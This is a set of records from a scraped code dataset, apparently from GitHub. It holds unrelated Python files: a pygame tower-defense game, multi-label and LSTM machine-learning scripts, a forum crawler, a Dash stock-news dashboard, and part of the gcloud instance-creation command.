sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('custom_collections')\n ### end Alembic commands ###\n","repo_name":"nkenealy/shopify-product-load","sub_path":"migrations/versions/589e155746cf_added_collection_class.py","file_name":"589e155746cf_added_collection_class.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38527365126","text":"import os.path\nfrom enemies.club import Club\nfrom enemies.ork import Ork\nfrom enemies.wizard import Wizard\nimport pygame\nfrom towers.stoneTowers import StoneTower, StoneTowerShort\nfrom towers.supportTower import DamageTower, RangeTower\nimport os\nimport time\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom menu.menu import VerticalMenu, PlayPauseButton\nimport random\n\n\npygame.font.init()\npygame.init()\n\npath = [(546, 700),(546, 644), (460, 553), (660, 366), (737, 310), (637, 183), (785, 164), (623, 135) ,(623, -10)]\n\n\nlifes_img = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"heart.png\")), (48, 48))\nstar_img = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"star.png\")), (50, 50))\nside_img = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"side.png\")), (200, 500))\n\n\nbuy_stone1 = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"stone1.png\")), (50, 50))\nbuy_stone2 = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"stone2.png\")), (50, 50))\nbuy_damage = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"buy_damage.png\")), (50, 50))\nbuy_range = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"buy_range.png\")), (50, 50))\n\nplay_btn = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets/menu\", \"play_button.png\")), (150, 50))\npause_btn = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets/menu\", \"pause_button.png\")), (150, 50))\n\nwave_bg = pygame.transform.scale(pygame.image.load(os.path.join(\"game_assets\", \"wave_bg.png\")), (250, 100))\n\n\nattack_tower_names = [\"stone1\", \"stone2\"]\nsupport_tower_names = [\"damage\", \"range\"]\n\n#load music\n#pygame.mixer.music.load(os.path.join(\"game_assets\", \"music.mp3\"))\n\n#waves are in form\n#frequency of enemies\n# (#ork, #wizard, #clubs)\n\nwaves = [\n [20, 0, 0],\n [50, 0, 0],\n [100, 0, 0],\n [0, 20, 0],\n [0, 50, 0],\n [0, 100, 0],\n [20, 100, 0],\n [50, 100, 0],\n [100, 100, 0],\n [0, 0, 50],\n [20, 0, 100],\n [20, 0, 150],\n [200, 100, 200],\n]\n\nclass Game:\n\n def __init__(self):\n self.width = 1350\n self.height = 700\n self.win = pygame.display.set_mode((self.width, self.height))\n self.enemys = []\n self.attack_towers = []\n self.support_towers = []\n self.lives = 10\n self.money = 1000\n self.bg = pygame.image.load(os.path.join(\"game_assets\", \"bg.png\"))\n self.bg = pygame.transform.scale(self.bg, (self.width, self.height))\n self.clicks = [] # remove\n self.timer = time.time()\n self.life_font = pygame.font.SysFont(\"comicsans\", 50)\n self.selected_tower = None\n self.menu = VerticalMenu(self.width - side_img.get_width() + 100, 150, side_img)\n self.menu.add_btn(buy_stone1, \"buy_stone1\", 300)\n self.menu.add_btn(buy_stone2, \"buy_stone2\", 500)\n self.menu.add_btn(buy_damage, \"buy_damage\", 200)\n self.menu.add_btn(buy_range, \"buy_range\", 400)\n self.wave = 0\n self.current_wave = waves[self.wave][:]\n self.pause = True\n self.playPauseButton = PlayPauseButton(play_btn, pause_btn, 10, self.height - 85)\n\n self.moving_object = None\n\n\n def gen_enemies(self):\n \"\"\"\n generate the next enemy or enemies to show\n :return: enemy\n \"\"\"\n if sum(self.current_wave)== 0 :\n if len(self.enemys) == 0:\n self.wave +=1\n self.current_wave = waves[self.wave]\n self.pause = True\n self.playPauseButton.paused = self.pause\n else:\n wave_enemies = [Ork(), Wizard(), Club()]\n for x in range(len(self.current_wave)):\n if self.current_wave[x] != 0:\n self.enemys.append(wave_enemies[x])\n self.current_wave[x] = self.current_wave[x] - 1\n break\n\n\n\n def run(self):\n # pygame.mixer.music.play(1)\n run = True\n clock = pygame.time.Clock()\n while run:\n clock.tick(100)\n\n if self.pause == False:\n #gen monsters\n if time.time() - self.timer >= random.randrange(1,5)/2:\n self.timer = time.time()\n self.gen_enemies()\n\n pos = pygame.mouse.get_pos()\n\n #check for moving object\n if self.moving_object:\n self.moving_object.move(pos[0], pos[1])\n tower_list = self.attack_towers[:] + self.support_towers[:]\n collide = False\n for tower in tower_list:\n if tower.collide(self.moving_object):\n collide = True\n tower.place_color = (255, 0, 0, 100)\n self.moving_object.place_color = (255, 0, 0, 100)\n else:\n tower.place_color = (0, 0, 255, 100)\n if not collide:\n self.moving_object.place_color = (0, 0, 0, 100)\n\n # main event loop\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n\n if event.type == pygame.MOUSEBUTTONUP:\n #if you'ra moving an object and click\n\n if self.moving_object:\n not_allowed = False\n tower_list = self.attack_towers[:] + self.support_towers[:]\n for tower in tower_list:\n if tower.collide(self.moving_object) :\n not_allowed = True\n\n\n if not not_allowed and self.point_to_line(self.moving_object):\n\n if self.moving_object.name in attack_tower_names:\n self.attack_towers.append(self.moving_object)\n elif self.moving_object.name in support_tower_names:\n self.support_towers.append(self.moving_object)\n\n self.moving_object.moving = False\n self.moving_object = None\n else:\n #check for plar or pause\n if self.playPauseButton.click(pos[0],pos[1]):\n self.pause = not(self.pause)\n self.playPauseButton.paused = self.pause\n\n\n\n #look if you click on side menu\n side_menu_button = self.menu.get_clicked(pos[0],pos[1])\n if side_menu_button:\n cost = self.menu.get_item_cost(side_menu_button)\n if self.money >= cost:\n self.money -= cost\n self.add_tower(side_menu_button)\n\n #look if you clicked on btn\n btn_clicked = None\n if self.selected_tower :\n btn_clicked = self.selected_tower.menu.get_clicked(pos[0],pos[1])\n if btn_clicked :\n print(btn_clicked)\n if btn_clicked == \"Upgrade\":\n cost = self.selected_tower.get_upgrade_cost()\n if self.money >= cost:\n self.money -= cost\n self.selected_tower.upgrade()\n\n\n if not (btn_clicked):\n #look if you click on attack towers\n for tw in self.attack_towers:\n if tw.click(pos[0],pos[1]):\n tw.selected = True\n self.selected_tower = tw\n else:\n tw.selected = False\n # look if you click on support towers\n for tw in self.support_towers:\n if tw.click(pos[0], pos[1]):\n tw.selected = True\n self.selected_tower = tw\n else:\n tw.selected = False\n\n if not(self.pause):\n # loop throught enemoes\n to_del = []\n for en in self.enemys:\n en.move()\n if en.y < -5:\n to_del.append(en)\n\n # delete all enemies off the screen\n for d in to_del:\n self.lives -= 1\n self.enemys.remove(d)\n\n\n # loop through attack_towers\n for tw in self.attack_towers:\n self.money += tw.attack(self.enemys)\n\n # loop through support _towers\n for tw in self.support_towers:\n tw.support(self.attack_towers)\n #if you lose\n if self.lives <= 0:\n print(\"You lose\")\n run = False\n\n self.draw()\n\n\n\n pygame.quit()\n\n def point_to_line(self, tower):\n \"\"\"\n returns if you can place tower based on distance from path\n :param tower: Tower\n :return: Bool\n \"\"\"\n\n # find two closest points\n return True\n\n def draw(self):\n self.win.blit(self.bg, (0, 0))\n # draw pacement rings\n if self.moving_object:\n for tower in self.attack_towers:\n tower.draw_placement(self.win)\n\n for tower in self.support_towers:\n tower.draw_placement(self.win)\n\n self.moving_object.draw_placement(self.win)\n\n\n # draw attack_towers\n\n for tw in self.attack_towers:\n tw.draw(self.win)\n\n # draw support_towers\n\n for tw in self.support_towers:\n tw.draw(self.win)\n # draw enemies\n\n for en in self.enemys:\n en.draw(self.win)\n\n #redraw selected tower\n if self.selected_tower:\n self.selected_tower.draw(self.win)\n\n\n #draw moving object\n if self.moving_object:\n self.moving_object.draw(self.win)\n\n\n #draw menu\n self.menu.draw(self.win)\n #draw play pause button\n self.playPauseButton.draw(self.win)\n\n #draw lives\n text = self.life_font.render(str(self.lives),1,(255, 255, 255))\n life = lifes_img\n start_x = self.width - life.get_width() -10\n\n self.win.blit(text, (start_x-text.get_width()-5, 5))\n self.win.blit(life, (start_x, 10))\n\n # draw money\n text = self.life_font.render(str(self.money), 1, (255, 255, 255))\n money = star_img\n start_x = self.width - life.get_width() - 10\n\n self.win.blit(text, (start_x - text.get_width() - 5, 70))\n self.win.blit(money, (start_x, 75))\n\n #draw wave\n self.win.blit(wave_bg, (10, 10))\n text = self.life_font.render(\"Wave #\" + str(self.wave),1, (255,255,255))\n self.win.blit(text, (10+ wave_bg.get_width()/2 - text.get_width()/2, 20))\n\n pygame.display.update()\n\n\n\n def add_tower(self, name):\n x, y = pygame.mouse.get_pos()\n name_list = [\"buy_stone1\",\"buy_stone2\", \"buy_damage\", \"buy_range\"]\n object_list = [StoneTower(x,y), StoneTowerShort(x,y), DamageTower(x,y), RangeTower(x,y)]\n try:\n obj = object_list[name_list.index(name)]\n self.moving_object = obj\n obj.moving = True\n except Exception as e:\n print(str(e) + \"NOT VALID NAME\")\n\n\n# win = pygame.display.set_mode((1350, 700))\n# g = Game()\n# g.run()\n","repo_name":"DemiyanPWNZ/project_game_Tower-Defense","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":11903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43374591862","text":"import scipy\nfrom scipy.io import arff\nimport pandas as pd\nfrom skmultilearn.problem_transform import BinaryRelevance\nfrom skmultilearn.problem_transform import ClassifierChain\nfrom skmultilearn.problem_transform import LabelPowerset\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.metrics import accuracy_score\nfrom skmultilearn.adapt import MLkNN\nimport numpy as np\n\ndata, meta = scipy.io.arff.loadarff('../../data/test/yeast-train.arff')\ndf_train = pd.DataFrame(data)\nstr_df = df_train.select_dtypes([np.object])\nstr_df = str_df.stack().str.decode('utf-8').unstack()\nX_train = df_train.iloc[:, 0:103]\nX_train = X_train.astype('float64')\ny_train = str_df\ny_train = y_train.astype('int')\n\ndata, meta = scipy.io.arff.loadarff('../../data/test/yeast-test.arff')\ndf_test = pd.DataFrame(data)\nstr_df = df_test.select_dtypes([np.object])\nstr_df = str_df.stack().str.decode('utf-8').unstack()\nX_test = df_test.iloc[:, 0:103]\nX_test = X_test.astype('float64')\ny_test = str_df\ny_test = y_test.astype('int')\n\n# ======================= Binary Relevance =================================\n# initialize binary relevance multi-label classifier\n# with a gaussian naive bayes base classifier\nclassifier = BinaryRelevance(GaussianNB())\n\n# train\nclassifier.fit(X_train, y_train)\n\n# predict\npredictions = classifier.predict(X_test)\n\nprint(accuracy_score(y_test, predictions))\n\n# ======================= Classifier Chains =================================\n# initialize classifier chains multi-label classifier\n# with a gaussian naive bayes base classifier\nclassifier = ClassifierChain(GaussianNB())\n\n# train\nclassifier.fit(X_train, y_train)\n\n# predict\npredictions = classifier.predict(X_test)\n\nprint(accuracy_score(y_test, predictions))\n\n# ======================= Label Powerset =================================\n# initialize Label Powerset multi-label classifier\n# with a gaussian naive bayes base classifier\nclassifier = LabelPowerset(GaussianNB())\n\n# train\nclassifier.fit(X_train, y_train)\n\n# predict\npredictions = classifier.predict(X_test)\n\nprint(accuracy_score(y_test, predictions))","repo_name":"phisitsrt/Data-Story","sub_path":"code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22689021855","text":"#coding:utf-8\r\nimport tensorflow as tf\r\nimport input_data\r\n\r\n#加载mnist数据集\r\nmnist = input_data.read_data_sets('mnist/',one_hot=True)\r\n\r\n#定义参数\r\nlearning_rate = 0.01\r\nepochs = 50000\r\nbatch_size = 128\r\nn_inputs = 28\r\nn_steps = 28\r\nn_hidden_units = 128\r\nn_classes = 10\r\n\r\nxs = tf.placeholder(tf.float32,[None,n_steps,n_inputs]) #输入形状\r\nys = tf.placeholder(tf.float32,[None,n_classes])\r\n\r\n#定义weights和biases\r\nweights = {\r\n \"in\":tf.Variable(tf.random_normal([n_inputs,n_hidden_units])),\r\n \"out\":tf.Variable(tf.random_normal([n_hidden_units,n_classes]))\r\n}\r\n\r\nbiases = {\r\n \"in\":tf.Variable(tf.constant(0.1,shape = [1,n_hidden_units])),\r\n \"out\":tf.Variable(tf.constant(0.1,shape = [1,n_classes]))\r\n}\r\n\r\ndef RNN(inputs,weights,biases):\r\n #将输入(128,28,28)维度变换(batch_size,n_inputs,n_steps)\r\n x = tf.reshape(inputs,[-1,n_inputs]) #x(128*28,28)\r\n x_in = tf.matmul(x,weights['in'])+biases['in'] #x_in(128*28,128)\r\n #将数据维度变换\r\n x_in = tf.reshape(x_in,[-1,n_steps,n_hidden_units]) #x_in(128,28,128)\r\n #定义RNN的cell\r\n lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(n_hidden_units,forget_bias=1.0) #设置初始biases = 1\r\n _init_state = lstm_cell.zero_state(batch_size,dtype=tf.float32) #初始化state\r\n #计算RNN\r\n outputs,states = tf.nn.dynamic_rnn(lstm_cell,x_in,initial_state=_init_state,time_major=False)\r\n #输出\r\n outputs = tf.unpack(tf.transpose(outputs,[1,0,2]))\r\n results = tf.matmul(outputs[-1],weights['out'])+biases['out']\r\n return results\r\n\r\nprediction = RNN(xs,weights,biases)\r\n#计算softmax层的cross_entropy\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(prediction,ys))\r\n#梯度下降\r\ntrain = tf.train.AdamOptimizer(learning_rate).minimize(cost)\r\n\r\ntrue_pred = tf.equal(tf.argmax(prediction,1),tf.argmax(ys,1))\r\naccuracy = tf.reduce_mean(tf.cast(true_pred,tf.float32))\r\n\r\n#初始化\r\ninit = tf.initialize_all_variables()\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n step = 0\r\n while step*batch_size < epochs:\r\n batch_xs,batch_ys = mnist.train.next_batch(batch_size)\r\n batch_xs = batch_xs.reshape([batch_size,n_steps,n_inputs])\r\n sess.run(train,feed_dict={xs:batch_xs,ys:batch_ys})\r\n if step % 50 ==0:\r\n print(sess.run(cost,cost,feed_dict={xs:batch_xs,ys:batch_ys}))\r\n step += 1\r\n print(sess.run(accuracy,cost,feed_dict={xs:batch_xs,ys:batch_ys}))","repo_name":"sun123zhengjun/deep-learning-","sub_path":"RNN.py","file_name":"RNN.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35015360309","text":"# -*- encoding:utf-8 -*-\n'''\nA crawler framework, can easily config to suit different content.\npython3.6\nwinxos 2017-10-24\n'''\nimport urllib.request\nimport urllib.error\nfrom lxml import etree\nimport logging\nimport socket\nfrom multiprocess_pool import multi_thread_do_job\n\nsocket.setdefaulttimeout(10)\nlogging.basicConfig(\n level=logging.DEBUG,\n filename='log.txt',\n filemode='w',\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')\n\n\ndef charset_detect(f):\n char_set = [\"utf8\", \"gb2132\", \"gbk\"]\n for c in char_set:\n try:\n f.decode(c)\n return c\n except:\n continue\n return None\n\n\ndef get_content(url, try_times=3):\n logging.debug(\"visiting:\" + url)\n try:\n proxy_handler = urllib.request.ProxyHandler({'http': 'http://127.0.0.1:1080'})\n opener = urllib.request.build_opener(proxy_handler)\n opener.addheaders = [('User-Agent', 'Mozilla/5.0')]\n f = opener.open(url).read()\n try:\n # data = f.decode(f.headers.get_content_charset()) #not robust\n logging.debug(\"charset \" + charset_detect(f))\n data = f.decode(charset_detect(f))\n return etree.HTML(data)\n except Exception as e:\n logging.debug(e)\n return None\n except urllib.error.URLError as e: # 捕捉访问异常,一般为timeout,信息在e中\n logging.debug(\"%s %s\" % (e, url))\n return None\n except TimeoutError:\n logging.debug(\"[retry %d] %s\" % (try_times, url))\n try_times -= 1\n if try_times > 0:\n return get_content(url)\n return None\n\n\ndef create_pages():\n entry = 'http://www.t66y.com/thread0806.php?fid=22&search=&page=%s'\n return [entry % i for i in range(1, 101)]\n\n\nelements = {\"item\": {\"type\": \"td[2]/text()\",\n \"author\": \"td[3]/a/text()\",\n \"title\": \"td[2]/h3/a/text()\", },\n \"url\": \"td[2]/h3/a/@href\",\n \"sub_item\": {\"text\": \"//div[@class=\\\"tpc_content do_not_catch\\\"]/a/@href\"},\n \"root\": \"//tr[@class=\\\"tr3 t_one tac\\\"]\"}\n\n\ndef get_item(page):\n ret = []\n cache = get_content(page)\n if cache is not None:\n items = cache.xpath(elements[\"root\"])\n for ii, item in enumerate(items):\n si = []\n for i in elements[\"item\"]:\n si.append(''.join(item.xpath(elements[\"item\"][i])).strip())\n sub_page_url = \"http://www.t66y.com/\" + ''.join(item.xpath(elements[\"url\"]))\n d = get_content(sub_page_url)\n real_url = str(d.xpath(elements[\"sub_item\"][\"text\"])[0])\n si.append(real_url[24:].replace(\"______\", \".\"))\n ret += si\n print(si)\n return ret\n return None\n\n\ndef test_py_crawler():\n pages = create_pages()\n multi_thread_do_job(pages, get_item)\n\n\ntest_py_crawler()\n","repo_name":"winxos/py_crawler","sub_path":"py_crawler.py","file_name":"py_crawler.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17194906543","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 12 23:15:56 2021\n\n@author: marcinswierczewski\n\"\"\"\n\nfrom stocks_api import finnhub_return_close_series, finnhub_news_company\n\nNEWS_AMOUNT = 7\nFROM_DATE = '2018-09-01'\nSTOCKS_LIST = ['MS','PPL','MSFT', 'PYPL', 'MAXR']\ndf = finnhub_return_close_series(STOCKS_LIST, FROM_DATE)\nnews = finnhub_news_company(STOCKS_LIST, FROM_DATE)\n\nfrom datetime import datetime\n\nimport dash\nfrom dash import dcc, html\nfrom dash.dependencies import Input, Output\nimport plotly.express as px\nimport dash_dangerously_set_inner_html\n\napp = dash.Dash(__name__)\n\napp.layout = html.Div([\n \n html.Div([\n html.Div([\n\n html.Div([\n html.H5('Marcins Browse of the Followed Stocks'),\n html.H6('Dashboard inspired by GS style dashboards.', style=dict(color='#7F90AC')),\n ], className = \"nine columns padded\" ),\n\n html.Div([\n html.H1([html.Span('V.', style=dict(opacity=0.5)), html.Span('0.1')]),\n html.H6('Daily updates below')\n ], className = \"three columns gs-header gs-accent-header padded\", style=dict(float='right') ),\n\n ], className = \"row gs-header gs-text-header\"),\n \n \n \n \n \n dcc.Dropdown(\n id=\"ticker\",\n options=[{\"label\": x, \"value\": x} \n for x in df.columns],\n value=df.columns[0],\n clearable=False,),\n dcc.Graph(id=\"time-series-chart\"),\n \n \n \n \n html.Div([\n html.H6(\"Latest Company News:\", className = \"gs-header gs-table-header padded\"),\n ], className = \"twelve columns\" ),\n \n \n \n html.Div([\n html.P(id='text1')\n ], className = \"twelve columns \" ),\n \n \n \n html.Div([\n html.H6(\" \", className = \"gs-header gs-table-header padded\"),\n ], className = \"twelve columns\" ),\n\n\n\n ], className = \"page\" ),\n])\n\n@app.callback(\n [Output(\"time-series-chart\", \"figure\"),\n Output('text1', 'children')],\n [Input(\"ticker\", \"value\")])\ndef display_time_series(ticker):\n fig = px.line(df, x=df.index, y=ticker)\n \n news_len = len(news[ticker])\n max_news = min(news_len, NEWS_AMOUNT)\n all_recent_news = ''\n for i in range(max_news):\n headline = news[ticker][i]['headline']\n text = news[ticker][i]['summary']\n news_date = news[ticker][i]['datetime']\n url = news[ticker][i]['url']\n \n all_recent_news += 'Date: ' + str(datetime.fromtimestamp(news_date)) + '
      '\n all_recent_news += 'HEADLINE :' + str(headline) + '
      '\n all_recent_news += text + '

      '\n # all_recent_news += ' URL ' + url + '

      '\n\n\n \n \n \n return fig, dash_dangerously_set_inner_html.DangerouslySetInnerHTML(all_recent_news)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True, port=8050, host='0.0.0.0')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"marcinms7/stock-predictions","sub_path":"interactive_stocks_graphs.py","file_name":"interactive_stocks_graphs.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5274741887","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom googlecloudsdk.api_lib.compute import base_classes\nfrom googlecloudsdk.api_lib.compute import base_classes_resource_registry as resource_registry\nfrom googlecloudsdk.api_lib.compute import csek_utils\nfrom googlecloudsdk.api_lib.compute import image_utils\nfrom googlecloudsdk.api_lib.compute import instance_utils\nfrom googlecloudsdk.api_lib.compute import metadata_utils\nfrom googlecloudsdk.api_lib.compute.operations import poller\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.calliope import exceptions\nfrom googlecloudsdk.command_lib.compute import completers\nfrom googlecloudsdk.command_lib.compute import flags\nfrom googlecloudsdk.command_lib.compute.instances import flags as instances_flags\nfrom googlecloudsdk.command_lib.compute.resource_policies import flags as maintenance_flags\nfrom googlecloudsdk.command_lib.compute.resource_policies import util as maintenance_util\nfrom googlecloudsdk.command_lib.compute.sole_tenancy import flags as sole_tenancy_flags\nfrom googlecloudsdk.command_lib.util.args import labels_util\nfrom googlecloudsdk.core import exceptions as core_exceptions\nfrom googlecloudsdk.core import log\nimport six\nfrom six.moves import zip\n\nDETAILED_HELP = {\n 'DESCRIPTION': \"\"\"\\\n *{command}* facilitates the creation of Google Compute Engine\n virtual machines. For example, running:\n\n $ {command} example-instance-1 example-instance-2 example-instance-3 --zone us-central1-a\n\n will create three instances called `example-instance-1`,\n `example-instance-2`, and `example-instance-3` in the\n `us-central1-a` zone.\n\n When an instance is in RUNNING state and the system begins to boot,\n the instance creation is considered finished, and the command returns\n with a list of new virtual machines. Note that you usually cannot log\n into a new instance until it finishes booting. Check the progress of an\n instance using `gcloud compute instances get-serial-port-output`.\n\n For more examples, refer to the *EXAMPLES* section below.\n \"\"\",\n 'EXAMPLES': \"\"\"\\\n To create an instance with the latest ``Red Hat Enterprise Linux\n 8'' image available, run:\n\n $ {command} example-instance --image-family=rhel-8 --image-project=rhel-cloud --zone=us-central1-a\n \"\"\",\n}\n\n\ndef _CommonArgs(parser,\n enable_regional=False,\n enable_kms=False,\n deprecate_maintenance_policy=False,\n supports_reservation=False,\n enable_resource_policy=False,\n supports_min_node_cpus=False,\n snapshot_csek=False,\n image_csek=False):\n \"\"\"Register parser args common to all tracks.\"\"\"\n metadata_utils.AddMetadataArgs(parser)\n instances_flags.AddDiskArgs(parser, enable_regional, enable_kms=enable_kms)\n instances_flags.AddCreateDiskArgs(parser, enable_kms=enable_kms,\n enable_snapshots=True,\n resource_policy=enable_resource_policy,\n source_snapshot_csek=snapshot_csek,\n image_csek=image_csek)\n instances_flags.AddCanIpForwardArgs(parser)\n instances_flags.AddAddressArgs(parser, instances=True)\n instances_flags.AddAcceleratorArgs(parser)\n instances_flags.AddMachineTypeArgs(parser)\n instances_flags.AddMaintenancePolicyArgs(\n parser, deprecate=deprecate_maintenance_policy)\n instances_flags.AddNoRestartOnFailureArgs(parser)\n instances_flags.AddPreemptibleVmArgs(parser)\n instances_flags.AddServiceAccountAndScopeArgs(\n parser, False,\n extra_scopes_help='However, if neither `--scopes` nor `--no-scopes` are '\n 'specified and the project has no default service '\n 'account, then the instance will be created with no '\n 'scopes. Note that the level of access that a service '\n 'account has is determined by a combination of access '\n 'scopes and IAM roles so you must configure both '\n 'access scopes and IAM roles for the service account '\n 'to work properly.')\n instances_flags.AddTagsArgs(parser)\n instances_flags.AddCustomMachineTypeArgs(parser)\n instances_flags.AddNetworkArgs(parser)\n instances_flags.AddPrivateNetworkIpArgs(parser)\n instances_flags.AddHostnameArg(parser)\n instances_flags.AddImageArgs(parser, enable_snapshots=True)\n instances_flags.AddDeletionProtectionFlag(parser)\n instances_flags.AddPublicPtrArgs(parser, instance=True)\n instances_flags.AddNetworkTierArgs(parser, instance=True)\n instances_flags.AddShieldedInstanceConfigArgs(parser)\n instances_flags.AddDisplayDeviceArg(parser)\n\n if supports_reservation:\n instances_flags.AddReservationAffinityGroup(\n parser,\n group_text='Specifies the reservation for the instance.',\n affinity_text='The type of reservation for the instance.')\n\n sole_tenancy_flags.AddNodeAffinityFlagToParser(parser)\n\n if supports_min_node_cpus:\n sole_tenancy_flags.AddMinNodeCpusArg(parser)\n\n labels_util.AddCreateLabelsFlags(parser)\n\n parser.add_argument(\n '--description',\n help='Specifies a textual description of the instances.')\n\n instances_flags.INSTANCES_ARG_FOR_CREATE.AddArgument(\n parser, operation_type='create')\n\n csek_utils.AddCsekKeyArgs(parser)\n\n base.ASYNC_FLAG.AddToParser(parser)\n parser.display_info.AddFormat(\n resource_registry.RESOURCE_REGISTRY['compute.instances'].list_format)\n parser.display_info.AddCacheUpdater(completers.InstancesCompleter)\n\n\n@base.ReleaseTracks(base.ReleaseTrack.GA)\nclass Create(base.CreateCommand):\n \"\"\"Create Google Compute Engine virtual machine instances.\"\"\"\n\n _support_kms = True\n _support_nvdimm = False\n _support_public_dns = False\n _support_reservation = False\n _support_disk_resource_policy = False\n _support_erase_vss = False\n _support_machine_image_key = False\n _support_min_node_cpus = False\n _support_source_snapshot_csek = False\n _support_image_csek = False\n\n @classmethod\n def Args(cls, parser):\n _CommonArgs(parser, enable_kms=cls._support_kms)\n cls.SOURCE_INSTANCE_TEMPLATE = (\n instances_flags.MakeSourceInstanceTemplateArg())\n cls.SOURCE_INSTANCE_TEMPLATE.AddArgument(parser)\n instances_flags.AddLocalSsdArgs(parser)\n instances_flags.AddMinCpuPlatformArgs(parser, base.ReleaseTrack.GA)\n\n def Collection(self):\n return 'compute.instances'\n\n def GetSourceInstanceTemplate(self, args, resources):\n \"\"\"Get sourceInstanceTemplate value as required by API.\"\"\"\n if not args.IsSpecified('source_instance_template'):\n return None\n ref = self.SOURCE_INSTANCE_TEMPLATE.ResolveAsResource(args, resources)\n return ref.SelfLink()\n\n def GetSourceMachineImage(self, args, resources):\n \"\"\"Get sourceMachineImage value as required by API.\"\"\"\n return None\n\n def _BuildShieldedInstanceConfigMessage(self, messages, args):\n if (args.IsSpecified('shielded_vm_secure_boot') or\n args.IsSpecified('shielded_vm_vtpm') or\n args.IsSpecified('shielded_vm_integrity_monitoring')):\n return instance_utils.CreateShieldedInstanceConfigMessage(\n messages, args.shielded_vm_secure_boot, args.shielded_vm_vtpm,\n args.shielded_vm_integrity_monitoring)\n else:\n return None\n\n def _GetNetworkInterfaces(\n self, args, client, holder, instance_refs, skip_defaults):\n return instance_utils.GetNetworkInterfaces(\n args, client, holder, instance_refs, skip_defaults)\n\n def _GetDiskMessages(\n self, args, skip_defaults, instance_refs, compute_client,\n resource_parser, create_boot_disk, boot_disk_size_gb, image_uri,\n csek_keys):\n flags_to_check = [\n 'disk', 'local_ssd', 'boot_disk_type',\n 'boot_disk_device_name', 'boot_disk_auto_delete',\n 'require_csek_key_create',\n ]\n if self._support_kms:\n flags_to_check.extend([\n 'create_disk', 'boot_disk_kms_key', 'boot_disk_kms_project',\n 'boot_disk_kms_location', 'boot_disk_kms_keyring',\n ])\n if self._support_nvdimm:\n flags_to_check.extend(['local_nvdimm'])\n\n if (skip_defaults and\n not instance_utils.IsAnySpecified(args, *flags_to_check)):\n return [[] for _ in instance_refs]\n\n # A list of lists where the element at index i contains a list of\n # disk messages that should be set for the instance at index i.\n disks_messages = []\n\n # A mapping of zone to boot disk references for all existing boot\n # disks that are being attached.\n # TODO(b/36050875): Simplify since resources.Resource is now hashable.\n existing_boot_disks = {}\n for instance_ref in instance_refs:\n persistent_disks, boot_disk_ref = (\n instance_utils.CreatePersistentAttachedDiskMessages(\n resource_parser, compute_client, csek_keys,\n args.disk or [], instance_ref))\n persistent_create_disks = (\n instance_utils.CreatePersistentCreateDiskMessages(\n compute_client,\n resource_parser,\n csek_keys,\n getattr(args, 'create_disk', []),\n instance_ref,\n enable_kms=self._support_kms,\n enable_snapshots=True,\n resource_policy=self._support_disk_resource_policy,\n enable_source_snapshot_csek=self._support_source_snapshot_csek,\n enable_image_csek=self._support_image_csek))\n local_nvdimms = []\n if self._support_nvdimm:\n local_nvdimms = instance_utils.CreateLocalNvdimmMessages(\n args,\n resource_parser,\n compute_client.messages,\n instance_ref.zone,\n instance_ref.project\n )\n local_ssds = instance_utils.CreateLocalSsdMessages(\n args,\n resource_parser,\n compute_client.messages,\n instance_ref.zone,\n instance_ref.project\n )\n\n if create_boot_disk:\n boot_snapshot_uri = instance_utils.ResolveSnapshotURI(\n user_project=instance_refs[0].project,\n snapshot=args.source_snapshot,\n resource_parser=resource_parser)\n\n boot_disk = instance_utils.CreateDefaultBootAttachedDiskMessage(\n compute_client, resource_parser,\n disk_type=args.boot_disk_type,\n disk_device_name=args.boot_disk_device_name,\n disk_auto_delete=args.boot_disk_auto_delete,\n disk_size_gb=boot_disk_size_gb,\n require_csek_key_create=(\n args.require_csek_key_create if csek_keys else None),\n image_uri=image_uri,\n instance_ref=instance_ref,\n csek_keys=csek_keys,\n kms_args=args,\n snapshot_uri=boot_snapshot_uri,\n enable_kms=self._support_kms)\n persistent_disks = [boot_disk] + persistent_disks\n else:\n existing_boot_disks[boot_disk_ref.zone] = boot_disk_ref\n disks_messages.append(persistent_disks + persistent_create_disks +\n local_nvdimms + local_ssds)\n return disks_messages\n\n def _GetProjectToServiceAccountMap(\n self, args, instance_refs, client, skip_defaults):\n 